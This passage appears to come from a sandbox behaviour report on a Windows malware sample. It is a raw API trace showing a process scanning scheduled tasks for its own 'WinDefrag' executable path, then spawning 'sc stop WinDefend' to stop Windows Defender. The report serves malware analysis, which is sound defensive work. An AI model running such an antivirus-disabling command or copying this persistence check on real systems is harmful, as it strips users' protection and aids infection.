(in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2b, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.946] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x328100) returned 0x0 [0169.948] IRegisteredTaskCollection:get_Count (in: This=0x328100, pCount=0x18e390 | out: pCount=0x18e390*=1) returned 0x0 [0169.948] IRegisteredTaskCollection:get_Item (in: This=0x328100, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328270) returned 0x0 [0169.948] IRegisteredTask:get_Name (in: This=0x328270, pName=0x18e230 | out: pName=0x18e230*="UpdateLibrary") returned 0x0 [0169.948] IRegisteredTask:get_Xml (in: This=0x328270, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n Microsoft\\Windows\\Windows Media Sharing\\UpdateLibrary\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n $(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1001)\r\n $(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1002)\r\n 1.0\r\n \r\n \r\n \r\n true\r\n <QueryList>\r\n <Query\r\n Id=\"0\"\r\n Path=\"System\"\r\n >\r\n <Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-WMPNSS-Service'] and (EventID=14210)]]</Select>\r\n </Query>\r\n </QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n \r\n \"%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe\"\r\n \r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n true\r\n true\r\n \r\n") returned 0x0 [0169.952] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Windows Media Sharing\\UpdateLibrary\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n $(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1001)\r\n $(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1002)\r\n 1.0\r\n \r\n \r\n \r\n true\r\n <QueryList>\r\n <Query\r\n Id=\"0\"\r\n Path=\"System\"\r\n >\r\n <Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-WMPNSS-Service'] and (EventID=14210)]]</Select>\r\n </Query>\r\n </QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n \r\n \"%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe\"\r\n \r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n true\r\n true\r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.952] IUnknown:Release (This=0x328270) returned 0x0 [0169.952] IUnknown:Release (This=0x328100) returned 0x0 [0169.952] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x328100) returned 0x0 [0169.953] ITaskFolderCollection:get_Count (in: This=0x328100, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.953] IUnknown:Release (This=0x328100) returned 0x0 [0169.953] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.953] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2c, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.953] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x3280f0) returned 0x0 [0169.955] IRegisteredTaskCollection:get_Count (in: This=0x3280f0, pCount=0x18e390 | out: pCount=0x18e390*=1) returned 0x0 [0169.955] IRegisteredTaskCollection:get_Item (in: This=0x3280f0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328250) returned 0x0 [0169.955] IRegisteredTask:get_Name (in: This=0x328250, pName=0x18e230 | out: pName=0x18e230*="ConfigNotification") returned 0x0 [0169.955] IRegisteredTask:get_Xml (in: This=0x328250, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n Microsoft Corporation\r\n Microsoft Corporation\r\n This scheduled task notifies the user that Windows Backup has not been configured.\r\n Microsoft\\Windows\\WindowsBackup\\ConfigNotification\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;S-1-5-87-2230524765-2343657310-2007128508-572789919-1856712407)\r\n \r\n \r\n \r\n 2010-11-28T10:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n true\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n %systemroot%\\System32\\sdclt.exe\r\n /CONFIGNOTIFICATION\r\n \r\n \r\n") returned 0x0 [0169.958] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft Corporation\r\n Microsoft Corporation\r\n This scheduled task notifies the user that Windows Backup has not been configured.\r\n Microsoft\\Windows\\WindowsBackup\\ConfigNotification\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;S-1-5-87-2230524765-2343657310-2007128508-572789919-1856712407)\r\n \r\n \r\n \r\n 2010-11-28T10:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n true\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n %systemroot%\\System32\\sdclt.exe\r\n /CONFIGNOTIFICATION\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.959] IUnknown:Release (This=0x328250) returned 0x0 [0169.959] IUnknown:Release (This=0x3280f0) returned 0x0 [0169.959] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x3280f0) returned 0x0 [0169.960] ITaskFolderCollection:get_Count (in: This=0x3280f0, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.960] IUnknown:Release (This=0x3280f0) returned 0x0 [0169.960] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.960] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2d, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.960] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x328100) returned 0x0 [0169.962] IRegisteredTaskCollection:get_Count (in: This=0x328100, pCount=0x18e390 | out: pCount=0x18e390*=1) returned 0x0 [0169.962] IRegisteredTaskCollection:get_Item (in: This=0x328100, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328260) returned 0x0 [0169.962] IRegisteredTask:get_Name (in: This=0x328260, pName=0x18e230 | out: pName=0x18e230*="Calibration Loader") returned 0x0 [0169.962] IRegisteredTask:get_Xml (in: This=0x328260, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FWFR;;;BU)\r\n \\Microsoft\\Windows\\WindowsColorSystem\\Calibration Loader\r\n $(@%SystemRoot%\\system32\\mscms.dll,-200)\r\n $(@%SystemRoot%\\system32\\mscms.dll,-201)\r\n $(@%SystemRoot%\\system32\\mscms.dll,-202)\r\n 1.0\r\n \r\n \r\n \r\n true\r\n \r\n \r\n true\r\n ConsoleConnect\r\n \r\n \r\n \r\n Queue\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n {B210D694-C8DF-490d-9576-9E20CDBC20BD}\r\n \r\n \r\n") returned 0x0 [0169.965] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FWFR;;;BU)\r\n \\Microsoft\\Windows\\WindowsColorSystem\\Calibration Loader\r\n $(@%SystemRoot%\\system32\\mscms.dll,-200)\r\n $(@%SystemRoot%\\system32\\mscms.dll,-201)\r\n $(@%SystemRoot%\\system32\\mscms.dll,-202)\r\n 1.0\r\n \r\n \r\n \r\n true\r\n \r\n \r\n true\r\n ConsoleConnect\r\n \r\n \r\n \r\n Queue\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n {B210D694-C8DF-490d-9576-9E20CDBC20BD}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.965] IUnknown:Release (This=0x328260) returned 0x0 [0169.965] IUnknown:Release (This=0x328100) returned 0x0 [0169.965] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x328100) returned 0x0 [0169.966] ITaskFolderCollection:get_Count (in: This=0x328100, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.966] IUnknown:Release (This=0x328100) returned 0x0 [0169.966] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.966] IUnknown:Release (This=0x326bd0) returned 0x0 [0169.966] TaskScheduler:IUnknown:Release (This=0x326b50) returned 0x0 [0169.966] ITaskFolderCollection:get_Item (in: This=0x326a10, index=0x18e590*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppFolder=0x18e540 | out: ppFolder=0x18e540*=0x326b50) returned 0x0 [0169.966] ITaskFolder:GetTasks (in: This=0x326b50, flags=1, ppTasks=0x18e3d0 | out: ppTasks=0x18e3d0*=0x326be0) returned 0x0 [0169.968] IRegisteredTaskCollection:get_Count (in: This=0x326be0, pCount=0x18e520 | out: pCount=0x18e520*=1) returned 0x0 [0169.968] IRegisteredTaskCollection:get_Item (in: This=0x326be0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e3c8 | out: ppRegisteredTask=0x18e3c8*=0x328070) returned 0x0 [0169.968] IRegisteredTask:get_Name (in: This=0x328070, pName=0x18e3c0 | out: pName=0x18e3c0*="MP Scheduled Scan") returned 0x0 [0169.968] IRegisteredTask:get_Xml (in: This=0x328070, pXml=0x18e3b0 | out: pXml=0x18e3b0*="\r\n\r\n \r\n Scheduled Scan\r\n \r\n \r\n \r\n 2000-01-01T05:07:30\r\n 2100-01-01T00:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n false\r\n true\r\n true\r\n false\r\n \r\n PT0H1M0S\r\n PT4H0M0S\r\n false\r\n false\r\n \r\n true\r\n true\r\n true\r\n true\r\n false\r\n true\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n c:\\program files\\windows defender\\MpCmdRun.exe\r\n Scan -ScheduleJob -WinTask -RestrictPrivilegesScan\r\n \r\n \r\n") returned 0x0 [0169.971] StrStrIW (lpFirst="\r\n\r\n \r\n Scheduled Scan\r\n \r\n \r\n \r\n 2000-01-01T05:07:30\r\n 2100-01-01T00:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n false\r\n true\r\n true\r\n false\r\n \r\n PT0H1M0S\r\n PT4H0M0S\r\n false\r\n false\r\n \r\n true\r\n true\r\n true\r\n true\r\n false\r\n true\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n c:\\program files\\windows defender\\MpCmdRun.exe\r\n Scan -ScheduleJob -WinTask -RestrictPrivilegesScan\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.971] IUnknown:Release (This=0x328070) returned 0x0 [0169.971] IUnknown:Release (This=0x326be0) returned 0x0 [0169.971] ITaskFolder:GetFolders (in: This=0x326b50, flags=0, ppFolders=0x18e3b8 | out: ppFolders=0x18e3b8*=0x326be0) returned 0x0 [0169.972] ITaskFolderCollection:get_Count (in: This=0x326be0, pCount=0x18e538 | out: pCount=0x18e538*=0) returned 0x0 [0169.972] IUnknown:Release (This=0x326be0) returned 0x0 [0169.972] TaskScheduler:IUnknown:Release (This=0x326b50) returned 0x0 [0169.972] IUnknown:Release (This=0x326a10) returned 0x0 [0169.972] TaskScheduler:IUnknown:Release (This=0x3269a0) returned 0x0 [0169.972] ITaskFolderCollection:get_Item (in: This=0x3268f0, index=0x18e720*(varType=0x3, wReserved1=0x39, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppFolder=0x18e6d0 | out: ppFolder=0x18e6d0*=0x3269a0) returned 0x0 [0169.972] ITaskFolder:GetTasks (in: This=0x3269a0, flags=1, ppTasks=0x18e560 | out: ppTasks=0x18e560*=0x326a40) returned 0x0 [0169.974] IRegisteredTaskCollection:get_Count (in: This=0x326a40, pCount=0x18e6b0 | out: pCount=0x18e6b0*=1) returned 0x0 [0169.974] IRegisteredTaskCollection:get_Item (in: This=0x326a40, index=0x18e590*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e558 | out: ppRegisteredTask=0x18e558*=0x326ba0) returned 0x0 [0169.974] IRegisteredTask:get_Name (in: This=0x326ba0, pName=0x18e550 | out: pName=0x18e550*="SvcRestartTask") returned 0x0 [0169.974] IRegisteredTask:get_Xml (in: This=0x326ba0, pXml=0x18e540 | out: pXml=0x18e540*="\r\n\r\n \r\n $(@%ProgramFiles%\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppc.dll,-200)\r\n $(@%ProgramFiles%\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppc.dll,-200)\r\n 1.0\r\n $(@%ProgramFiles%\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppc.dll,-201)\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-20)\r\n \r\n \r\n \r\n 2004-01-01T00:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n LeastPrivilege\r\n S-1-5-20\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n false\r\n true\r\n false\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n 7\r\n \r\n PT1M\r\n 3\r\n \r\n \r\n \r\n \r\n %systemroot%\\system32\\sc.exe\r\n start osppsvc\r\n \r\n \r\n") returned 0x0 [0169.978] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%ProgramFiles%\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppc.dll,-200)\r\n $(@%ProgramFiles%\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppc.dll,-200)\r\n 1.0\r\n $(@%ProgramFiles%\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppc.dll,-201)\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-20)\r\n \r\n \r\n \r\n 2004-01-01T00:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n LeastPrivilege\r\n S-1-5-20\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n false\r\n true\r\n false\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n 7\r\n \r\n PT1M\r\n 3\r\n \r\n \r\n \r\n \r\n %systemroot%\\system32\\sc.exe\r\n start osppsvc\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.978] IUnknown:Release (This=0x326ba0) returned 0x0 [0169.978] IUnknown:Release (This=0x326a40) returned 0x0 [0169.978] ITaskFolder:GetFolders (in: This=0x3269a0, flags=0, ppFolders=0x18e548 | out: ppFolders=0x18e548*=0x326a40) returned 0x0 [0169.979] ITaskFolderCollection:get_Count (in: This=0x326a40, pCount=0x18e6c8 | out: pCount=0x18e6c8*=0) returned 0x0 [0169.980] IUnknown:Release (This=0x326a40) returned 0x0 [0169.980] TaskScheduler:IUnknown:Release (This=0x3269a0) returned 0x0 [0169.980] ITaskFolderCollection:get_Item (in: This=0x3268f0, index=0x18e720*(varType=0x3, wReserved1=0x39, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppFolder=0x18e6d0 | out: ppFolder=0x18e6d0*=0x3269a0) returned 0x0 [0169.980] ITaskFolder:GetTasks (in: This=0x3269a0, flags=1, ppTasks=0x18e560 | out: ppTasks=0x18e560*=0x326a10) returned 0x0 [0169.981] IRegisteredTaskCollection:get_Count (in: This=0x326a10, pCount=0x18e6b0 | out: pCount=0x18e6b0*=0) returned 0x0 [0169.981] IUnknown:Release (This=0x326a10) returned 0x0 [0169.981] ITaskFolder:GetFolders (in: This=0x3269a0, flags=0, ppFolders=0x18e548 | out: ppFolders=0x18e548*=0x326a10) returned 0x0 [0169.982] ITaskFolderCollection:get_Count (in: This=0x326a10, pCount=0x18e6c8 | out: pCount=0x18e6c8*=0) returned 0x0 [0169.982] IUnknown:Release (This=0x326a10) returned 0x0 [0169.982] TaskScheduler:IUnknown:Release (This=0x3269a0) returned 0x0 [0169.982] IUnknown:Release (This=0x3268f0) returned 0x0 [0169.982] IUnknown:Release (This=0x326850) returned 0x0 [0169.982] TaskScheduler:IUnknown:Release (This=0x3267a0) returned 0x0 [0169.982] CloseHandle (hObject=0xfc) returned 1 [0169.982] FreeLibrary (hLibModule=0x7fefd620000) returned 1 [0169.982] FreeLibrary (hLibModule=0x7fefd5f0000) returned 1 [0169.983] CoUninitialize () [0169.986] exit (_Code=-1) Thread: id = 285 os_tid = 0x524 Process: id = "22" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x63cd000" os_pid = "0xa6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "18" os_parent_pid = "0x528" cmd_line = "sc stop WinDefend" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3143 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3144 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3145 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3146 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 3147 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 3148 start_va = 0x80000 end_va = 0x8bfff entry_point = 0x80000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 3149 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 3150 start_va = 0x210000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 3151 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3152 start_va = 0x77e20000 end_va = 0x77f9ffff entry_point = 0x77e20000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3153 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 3154 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 3155 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 3156 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 3157 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3158 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3159 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3160 start_va = 0x350000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 3161 start_va = 0x752a0000 end_va = 0x752a7fff entry_point = 0x752a0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3162 start_va = 0x752b0000 end_va = 0x7530bfff entry_point = 0x752b0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3163 start_va = 0x75310000 end_va = 0x7534efff entry_point = 0x75310000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3164 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3165 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 3166 start_va = 0x110000 end_va = 0x176fff entry_point = 0x110000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3167 start_va = 0x4d0000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 3168 start_va = 0x760000 end_va = 0x76ffff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 3169 start_va = 0x75970000 end_va = 0x7597bfff entry_point = 0x75970000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3170 start_va = 0x75980000 end_va = 0x759dffff entry_point = 0x75980000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3171 start_va = 0x759e0000 end_va = 0x759f8fff entry_point = 0x759e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3172 start_va = 0x75a10000 end_va = 0x75abbfff entry_point = 0x75a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3173 start_va = 0x75f40000 end_va = 0x75f85fff entry_point = 0x75f40000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3174 start_va = 0x760d0000 end_va = 0x761bffff entry_point = 0x760d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3175 start_va = 0x76220000 end_va = 0x7632ffff entry_point = 0x76220000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3176 start_va = 0x76490000 end_va = 0x7652ffff entry_point = 0x76490000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3177 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x0 region_type = private name = "private_0x0000000077a20000" filename = "" Region: id = 3178 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x0 region_type = private name = "private_0x0000000077b20000" filename = "" Region: id = 3179 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3180 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3367 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3368 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 3369 start_va = 0x90000 end_va = 0x9ffff entry_point = 0x90000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 152 os_tid = 0xa7c [0140.623] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10fedc | out: lpSystemTimeAsFileTime=0x10fedc*(dwLowDateTime=0xf3431d40, dwHighDateTime=0x1d48db2)) [0140.623] GetCurrentProcessId () returned 0xa6c [0140.623] GetCurrentThreadId () returned 0xa7c [0140.623] GetTickCount () returned 0x2ec51 [0140.623] QueryPerformanceCounter (in: lpPerformanceCount=0x10fed4 | out: lpPerformanceCount=0x10fed4*=1820824700000) returned 1 [0140.624] GetModuleHandleA (lpModuleName=0x0) returned 0x80000 [0140.624] __set_app_type (_Type=0x1) [0140.624] __p__fmode () returned 0x75ab31f4 [0140.624] __p__commode () returned 0x75ab31fc [0140.624] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x879c7) returned 0x0 [0140.624] __wgetmainargs (in: _Argc=0x89020, _Argv=0x89028, _Env=0x89024, _DoWildCard=0, _StartInfo=0x89034 | out: _Argc=0x89020, _Argv=0x89028, _Env=0x89024) returned 0 [0140.624] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.627] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.627] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0140.627] wcsncmp (_String1="st", _String2="\\\\", _MaxCount=0x2) returned 23 [0140.627] _wcsicmp (_String1="stop", _String2="query") returned 2 [0140.627] _wcsicmp (_String1="stop", _String2="queryex") returned 2 [0140.627] _wcsicmp (_String1="stop", _String2="start") returned 14 [0140.627] _wcsicmp (_String1="stop", _String2="pause") returned 3 [0140.627] _wcsicmp (_String1="stop", _String2="interrogate") returned 10 [0140.627] _wcsicmp (_String1="stop", _String2="control") returned 16 [0140.627] _wcsicmp (_String1="stop", _String2="continue") returned 16 [0140.627] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0140.628] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x4df698 [0140.860] OpenServiceW (hSCManager=0x4df698, 